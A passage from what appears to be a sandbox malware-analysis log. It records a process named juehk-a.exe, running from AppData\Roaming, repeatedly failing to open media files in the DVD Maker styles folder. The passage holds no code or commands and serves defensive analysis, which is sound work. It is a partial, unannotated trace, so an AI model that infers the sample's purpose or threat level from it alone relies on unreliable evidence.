27328.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27329.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27330.            ads:
27331.          fid (ads:): 0
27332.          failure: open
27333.          ntstatus: 0xc0000022
27334.          CreateOptions: 0x60
27335.        file:
27336.          timestamp: 91098
27337.          mode: failed
27338.          sequenceNumber: 1930
27339.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png
27340.          processinfo:
27341.            pid: 1648
27342.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27343.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27344.            ads:
27345.          fid (ads:): 0
27346.          failure: open
27347.          ntstatus: 0xc0000022
27348.          CreateOptions: 0x60
27349.        file:
27350.          timestamp: 91104
27351.          mode: failed
27352.          sequenceNumber: 1931
27353.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png
27354.          processinfo:
27355.            pid: 1648
27356.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27357.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27358.            ads:
27359.          fid (ads:): 0
27360.          failure: open
27361.          ntstatus: 0xc0000022
27362.          CreateOptions: 0x60
27363.        file:
27364.          timestamp: 91111
27365.          mode: failed
27366.          sequenceNumber: 1932
27367.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_mainImage-mask.png
27368.          processinfo:
27369.            pid: 1648
27370.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27371.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27372.            ads:
27373.          fid (ads:): 0
27374.          failure: open
27375.          ntstatus: 0xc0000022
27376.          CreateOptions: 0x60
27377.        file:
27378.          timestamp: 91124
27379.          mode: failed
27380.          sequenceNumber: 1933
27381.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png
27382.          processinfo:
27383.            pid: 1648
27384.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27386.            ads:
27387.          fid (ads:): 0
27388.          failure: open
27389.          ntstatus: 0xc0000022
27390.          CreateOptions: 0x60
27391.        file:
27392.          timestamp: 91129
27393.          mode: failed
27394.          sequenceNumber: 1934
27395.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png
27396.          processinfo:
27397.            pid: 1648
27398.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27399.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27400.            ads:
27401.          fid (ads:): 0
27402.          failure: open
27403.          ntstatus: 0xc0000022
27404.          CreateOptions: 0x60
27405.        file:
27406.          timestamp: 91133
27407.          mode: failed
27408.          sequenceNumber: 1935
27409.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png
27410.          processinfo:
27411.            pid: 1648
27412.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27413.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27414.            ads:
27415.          fid (ads:): 0
27416.          failure: open
27417.          ntstatus: 0xc0000022
27418.          CreateOptions: 0x60
27419.        file:
27420.          timestamp: 91137
27421.          mode: failed
27422.          sequenceNumber: 1936
27423.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png
27424.          processinfo:
27425.            pid: 1648
27426.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27427.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27428.            ads:
27429.          fid (ads:): 0
27430.          failure: open
27431.          ntstatus: 0xc0000022
27432.          CreateOptions: 0x60
27433.        file:
27434.          timestamp: 91142
27435.          mode: failed
27436.          sequenceNumber: 1937
27437.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png
27438.          processinfo:
27439.            pid: 1648
27440.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27441.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27442.            ads:
27443.          fid (ads:): 0
27444.          failure: open
27445.          ntstatus: 0xc0000022
27446.          CreateOptions: 0x60
27447.        file:
27448.          timestamp: 91147
27449.          mode: failed
27450.          sequenceNumber: 1938
27451.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png
27452.          processinfo:
27453.            pid: 1648
27454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27456.            ads:
27457.          fid (ads:): 0
27458.          failure: open
27459.          ntstatus: 0xc0000022
27460.          CreateOptions: 0x60
27461.        file:
27462.          timestamp: 91151
27463.          mode: failed
27464.          sequenceNumber: 1939
27465.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png
27466.          processinfo:
27467.            pid: 1648
27468.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27469.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27470.            ads:
27471.          fid (ads:): 0
27472.          failure: open
27473.          ntstatus: 0xc0000022
27474.          CreateOptions: 0x60
27475.        file:
27476.          timestamp: 91156
27477.          mode: failed
27478.          sequenceNumber: 1940
27479.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png
27480.          processinfo:
27481.            pid: 1648
27482.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27483.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27484.            ads:
27485.          fid (ads:): 0
27486.          failure: open
27487.          ntstatus: 0xc0000022
27488.          CreateOptions: 0x60
27489.        file:
27490.          timestamp: 91161
27491.          mode: failed
27492.          sequenceNumber: 1941
27493.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png
27494.          processinfo:
27495.            pid: 1648
27496.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27497.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27498.            ads:
27499.          fid (ads:): 0
27500.          failure: open
27501.          ntstatus: 0xc0000022
27502.          CreateOptions: 0x60
27503.        file:
27504.          timestamp: 91166
27505.          mode: failed
27506.          sequenceNumber: 1942
27507.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png
27508.          processinfo:
27509.            pid: 1648
27510.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27511.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27512.            ads:
27513.          fid (ads:): 0
27514.          failure: open
27515.          ntstatus: 0xc0000022
27516.          CreateOptions: 0x60
27517.        file:
27518.          timestamp: 91172
27519.          mode: failed
27520.          sequenceNumber: 1943
27521.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png
27522.          processinfo:
27523.            pid: 1648
27524.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27525.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27526.            ads:
27527.          fid (ads:): 0
27528.          failure: open
27529.          ntstatus: 0xc0000022
27530.          CreateOptions: 0x60
27531.        file:
27532.          timestamp: 91177
27533.          mode: failed
27534.          sequenceNumber: 1944
27535.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png
27536.          processinfo:
27537.            pid: 1648
27538.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27540.            ads:
27541.          fid (ads:): 0
27542.          failure: open
27543.          ntstatus: 0xc0000022
27544.          CreateOptions: 0x60
27545.        file:
27546.          timestamp: 91184
27547.          mode: failed
27548.          sequenceNumber: 1945
27549.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png
27550.          processinfo:
27551.            pid: 1648
27552.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27553.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27554.            ads:
27555.          fid (ads:): 0
27556.          failure: open
27557.          ntstatus: 0xc0000022
27558.          CreateOptions: 0x60
27559.        file:
27560.          timestamp: 91191
27561.          mode: failed
27562.          sequenceNumber: 1946
27563.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png
27564.          processinfo:
27565.            pid: 1648
27566.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27567.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27568.            ads:
27569.          fid (ads:): 0
27570.          failure: open
27571.          ntstatus: 0xc0000022
27572.          CreateOptions: 0x60
27573.        file:
27574.          timestamp: 91198
27575.          mode: failed
27576.          sequenceNumber: 1947
27577.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png
27578.          processinfo:
27579.            pid: 1648
27580.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27581.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27582.            ads:
27583.          fid (ads:): 0
27584.          failure: open
27585.          ntstatus: 0xc0000022
27586.          CreateOptions: 0x60
27587.        file:
27588.          timestamp: 91204
27589.          mode: failed
27590.          sequenceNumber: 1948
27591.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png
27592.          processinfo:
27593.            pid: 1648
27594.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27595.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27596.            ads:
27597.          fid (ads:): 0
27598.          failure: open
27599.          ntstatus: 0xc0000022
27600.          CreateOptions: 0x60
27601.        file:
27602.          timestamp: 91209
27603.          mode: failed
27604.          sequenceNumber: 1949
27605.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png
27606.          processinfo:
27607.            pid: 1648
27608.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27610.            ads:
27611.          fid (ads:): 0
27612.          failure: open
27613.          ntstatus: 0xc0000022
27614.          CreateOptions: 0x60
27615.        file:
27616.          timestamp: 91215
27617.          mode: failed
27618.          sequenceNumber: 1950
27619.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png
27620.          processinfo:
27621.            pid: 1648
27622.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27624.            ads:
27625.          fid (ads:): 0
27626.          failure: open
27627.          ntstatus: 0xc0000022
27628.          CreateOptions: 0x60
27629.        file:
27630.          timestamp: 91223
27631.          mode: failed
27632.          sequenceNumber: 1951
27633.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png
27634.          processinfo:
27635.            pid: 1648
27636.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27637.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27638.            ads:
27639.          fid (ads:): 0
27640.          failure: open
27641.          ntstatus: 0xc0000022
27642.          CreateOptions: 0x60
27643.        file:
27644.          timestamp: 91230
27645.          mode: failed
27646.          sequenceNumber: 1952
27647.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png
27648.          processinfo:
27649.            pid: 1648
27650.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27651.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27652.            ads:
27653.          fid (ads:): 0
27654.          failure: open
27655.          ntstatus: 0xc0000022
27656.          CreateOptions: 0x60
27657.        file:
27658.          timestamp: 91701
27659.          mode: failed
27660.          sequenceNumber: 1953
27661.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png
27662.          processinfo:
27663.            pid: 1648
27664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27666.            ads:
27667.          fid (ads:): 0
27668.          failure: open
27669.          ntstatus: 0xc0000022
27670.          CreateOptions: 0x60
27671.        file:
27672.          timestamp: 91706
27673.          mode: failed
27674.          sequenceNumber: 1954
27675.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv
27676.          processinfo:
27677.            pid: 1648
27678.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27679.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27680.            ads:
27681.          fid (ads:): 0
27682.          failure: open
27683.          ntstatus: 0xc0000022
27684.          CreateOptions: 0x60
27685.        file:
27686.          timestamp: 91712
27687.          mode: failed
27688.          sequenceNumber: 1955
27689.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv
27690.          processinfo:
27691.            pid: 1648
27692.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27693.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27694.            ads:
27695.          fid (ads:): 0
27696.          failure: open
27697.          ntstatus: 0xc0000022
27698.          CreateOptions: 0x60
27699.        file:
27700.          timestamp: 91730
27701.          mode: failed
27702.          sequenceNumber: 1956
27703.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png
27704.          processinfo:
27705.            pid: 1648
27706.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27707.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27708.            ads:
27709.          fid (ads:): 0
27710.          failure: open
27711.          ntstatus: 0xc0000022
27712.          CreateOptions: 0x60
27713.        file:
27714.          timestamp: 91734
27715.          mode: failed
27716.          sequenceNumber: 1957
27717.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png
27718.          processinfo:
27719.            pid: 1648
27720.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27721.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27722.            ads:
27723.          fid (ads:): 0
27724.          failure: open
27725.          ntstatus: 0xc0000022
27726.          CreateOptions: 0x60
27727.        file:
27728.          timestamp: 91738
27729.          mode: failed
27730.          sequenceNumber: 1958
27731.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png
27732.          processinfo:
27733.            pid: 1648
27734.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27736.            ads:
27737.          fid (ads:): 0
27738.          failure: open
27739.          ntstatus: 0xc0000022
27740.          CreateOptions: 0x60
27741.        file:
27742.          timestamp: 91742
27743.          mode: failed
27744.          sequenceNumber: 1959
27745.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png
27746.          processinfo:
27747.            pid: 1648
27748.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27749.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27750.            ads:
27751.          fid (ads:): 0
27752.          failure: open
27753.          ntstatus: 0xc0000022
27754.          CreateOptions: 0x60
27755.        file:
27756.          timestamp: 91747
27757.          mode: failed
27758.          sequenceNumber: 1960
27759.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png
27760.          processinfo:
27761.            pid: 1648
27762.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27763.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27764.            ads:
27765.          fid (ads:): 0
27766.          failure: open
27767.          ntstatus: 0xc0000022
27768.          CreateOptions: 0x60
27769.        file:
27770.          timestamp: 91751
27771.          mode: failed
27772.          sequenceNumber: 1961
27773.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png
27774.          processinfo:
27775.            pid: 1648
27776.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27777.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27778.            ads:
27779.          fid (ads:): 0
27780.          failure: open
27781.          ntstatus: 0xc0000022
27782.          CreateOptions: 0x60
27783.        file:
27784.          timestamp: 91756
27785.          mode: failed
27786.          sequenceNumber: 1962
27787.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png
27788.          processinfo:
27789.            pid: 1648
27790.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27791.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27792.            ads:
27793.          fid (ads:): 0
27794.          failure: open
27795.          ntstatus: 0xc0000022
27796.          CreateOptions: 0x60
27797.        file:
27798.          timestamp: 91760
27799.          mode: failed
27800.          sequenceNumber: 1963
27801.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png
27802.          processinfo:
27803.            pid: 1648
27804.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27805.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27806.            ads:
27807.          fid (ads:): 0
27808.          failure: open
27809.          ntstatus: 0xc0000022
27810.          CreateOptions: 0x60
27811.        file:
27812.          timestamp: 91764
27813.          mode: failed
27814.          sequenceNumber: 1964
27815.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv
27816.          processinfo:
27817.            pid: 1648
27818.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27820.            ads:
27821.          fid (ads:): 0
27822.          failure: open
27823.          ntstatus: 0xc0000022
27824.          CreateOptions: 0x60
27825.        file:
27826.          timestamp: 91770
27827.          mode: failed
27828.          sequenceNumber: 1965
27829.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv
27830.          processinfo:
27831.            pid: 1648
27832.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27833.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27834.            ads:
27835.          fid (ads:): 0
27836.          failure: open
27837.          ntstatus: 0xc0000022
27838.          CreateOptions: 0x60
27839.        file:
27840.          timestamp: 91777
27841.          mode: failed
27842.          sequenceNumber: 1966
27843.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png
27844.          processinfo:
27845.            pid: 1648
27846.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27847.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27848.            ads:
27849.          fid (ads:): 0
27850.          failure: open
27851.          ntstatus: 0xc0000022
27852.          CreateOptions: 0x60
27853.        file:
27854.          timestamp: 91784
27855.          mode: failed
27856.          sequenceNumber: 1967
27857.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png
27858.          processinfo:
27859.            pid: 1648
27860.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27861.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27862.            ads:
27863.          fid (ads:): 0
27864.          failure: open
27865.          ntstatus: 0xc0000022
27866.          CreateOptions: 0x60
27867.        file:
27868.          timestamp: 91790
27869.          mode: failed
27870.          sequenceNumber: 1968
27871.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv
27872.          processinfo:
27873.            pid: 1648
27874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27876.            ads:
27877.          fid (ads:): 0
27878.          failure: open
27879.          ntstatus: 0xc0000022
27880.          CreateOptions: 0x60
27881.        file:
27882.          timestamp: 91798
27883.          mode: failed
27884.          sequenceNumber: 1969
27885.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv
27886.          processinfo:
27887.            pid: 1648
27888.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27889.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27890.            ads:
27891.          fid (ads:): 0
27892.          failure: open
27893.          ntstatus: 0xc0000022
27894.          CreateOptions: 0x60
27895.        file:
27896.          timestamp: 91804
27897.          mode: failed
27898.          sequenceNumber: 1970
27899.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv
27900.          processinfo:
27901.            pid: 1648
27902.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27903.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27904.            ads:
27905.          fid (ads:): 0
27906.          failure: open
27907.          ntstatus: 0xc0000022
27908.          CreateOptions: 0x60
27909.        file:
27910.          timestamp: 91810
27911.          mode: failed
27912.          sequenceNumber: 1971
27913.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv
27914.          processinfo:
27915.            pid: 1648
27916.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27917.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27918.            ads:
27919.          fid (ads:): 0
27920.          failure: open
27921.          ntstatus: 0xc0000022
27922.          CreateOptions: 0x60
27923.        file:
27924.          timestamp: 91817
27925.          mode: failed
27926.          sequenceNumber: 1972
27927.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv
27928.          processinfo:
27929.            pid: 1648
27930.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27931.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27932.            ads:
27933.          fid (ads:): 0
27934.          failure: open
27935.          ntstatus: 0xc0000022
27936.          CreateOptions: 0x60
27937.        file:
27938.          timestamp: 91826
27939.          mode: failed
27940.          sequenceNumber: 1973
27941.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv
27942.          processinfo:
27943.            pid: 1648
27944.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27946.            ads:
27947.          fid (ads:): 0
27948.          failure: open
27949.          ntstatus: 0xc0000022
27950.          CreateOptions: 0x60
27951.        file:
27952.          timestamp: 91868
27953.          mode: failed
27954.          sequenceNumber: 1974
27955.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png
27956.          processinfo:
27957.            pid: 1648
27958.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27959.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27960.            ads:
27961.          fid (ads:): 0
27962.          failure: open
27963.          ntstatus: 0xc0000022
27964.          CreateOptions: 0x60
27965.        file:
27966.          timestamp: 91874
27967.          mode: failed
27968.          sequenceNumber: 1975
27969.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png
27970.          processinfo:
27971.            pid: 1648
27972.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27973.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27974.            ads:
27975.          fid (ads:): 0
27976.          failure: open
27977.          ntstatus: 0xc0000022
27978.          CreateOptions: 0x60
27979.        file:
27980.          timestamp: 91898
27981.          mode: failed
27982.          sequenceNumber: 1976
27983.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv
27984.          processinfo:
27985.            pid: 1648
27986.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27987.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27988.            ads:
27989.          fid (ads:): 0
27990.          failure: open
27991.          ntstatus: 0xc0000022
27992.          CreateOptions: 0x60
27993.        file:
27994.          timestamp: 91905
27995.          mode: failed
27996.          sequenceNumber: 1977
27997.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv
27998.          processinfo:
27999.            pid: 1648
28000.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28002.            ads:
28003.          fid (ads:): 0
28004.          failure: open
28005.          ntstatus: 0xc0000022
28006.          CreateOptions: 0x60
28007.        file:
28008.          timestamp: 91911
28009.          mode: failed
28010.          sequenceNumber: 1978
28011.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv
28012.          processinfo:
28013.            pid: 1648
28014.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28015.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28016.            ads:
28017.          fid (ads:): 0
28018.          failure: open
28019.          ntstatus: 0xc0000022
28020.          CreateOptions: 0x60
28021.        file:
28022.          timestamp: 91917
28023.          mode: failed
28024.          sequenceNumber: 1979
28025.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv
28026.          processinfo:
28027.            pid: 1648
28028.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28029.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28030.            ads:
28031.          fid (ads:): 0
28032.          failure: open
28033.          ntstatus: 0xc0000022
28034.          CreateOptions: 0x60
28035.        file:
28036.          timestamp: 91945
28037.          mode: failed
28038.          sequenceNumber: 1980
28039.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png
28040.          processinfo:
28041.            pid: 1648
28042.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28043.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28044.            ads:
28045.          fid (ads:): 0
28046.          failure: open
28047.          ntstatus: 0xc0000022
28048.          CreateOptions: 0x60
28049.        file:
28050.          timestamp: 91952
28051.          mode: failed
28052.          sequenceNumber: 1981
28053.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png
28054.          processinfo:
28055.            pid: 1648
28056.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28057.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28058.            ads:
28059.          fid (ads:): 0
28060.          failure: open
28061.          ntstatus: 0xc0000022
28062.          CreateOptions: 0x60
28063.        file:
28064.          timestamp: 91959
28065.          mode: failed
28066.          sequenceNumber: 1982
28067.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png
28068.          processinfo:
28069.            pid: 1648
28070.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28071.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28072.            ads:
28073.          fid (ads:): 0
28074.          failure: open
28075.          ntstatus: 0xc0000022
28076.          CreateOptions: 0x60
28077.        file:
28078.          timestamp: 91965
28079.          mode: failed
28080.          sequenceNumber: 1983
28081.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png
28082.          processinfo:
28083.            pid: 1648
28084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28086.            ads:
28087.          fid (ads:): 0
28088.          failure: open
28089.          ntstatus: 0xc0000022
28090.          CreateOptions: 0x60
28091.        file:
28092.          timestamp: 91975
28093.          mode: failed
28094.          sequenceNumber: 1984
28095.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-over-DOT.png
28096.          processinfo:
28097.            pid: 1648
28098.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28099.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28100.            ads:
28101.          fid (ads:): 0
28102.          failure: open
28103.          ntstatus: 0xc0000022
28104.          CreateOptions: 0x60
28105.        file:
28106.          timestamp: 91982
28107.          mode: failed
28108.          sequenceNumber: 1985
28109.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png
28110.          processinfo:
28111.            pid: 1648
28112.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28113.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28114.            ads:
28115.          fid (ads:): 0
28116.          failure: open
28117.          ntstatus: 0xc0000022
28118.          CreateOptions: 0x60
28119.        file:
28120.          timestamp: 91988
28121.          mode: failed
28122.          sequenceNumber: 1986
28123.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png
28124.          processinfo:
28125.            pid: 1648
28126.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28127.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28128.            ads:
28129.          fid (ads:): 0
28130.          failure: open
28131.          ntstatus: 0xc0000022
28132.          CreateOptions: 0x60
28133.        file:
28134.          timestamp: 91997
28135.          mode: failed
28136.          sequenceNumber: 1987
28137.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png
28138.          processinfo:
28139.            pid: 1648
28140.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28141.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28142.            ads:
28143.          fid (ads:): 0
28144.          failure: open
28145.          ntstatus: 0xc0000022
28146.          CreateOptions: 0x60
28147.        file:
28148.          timestamp: 92004
28149.          mode: failed
28150.          sequenceNumber: 1988
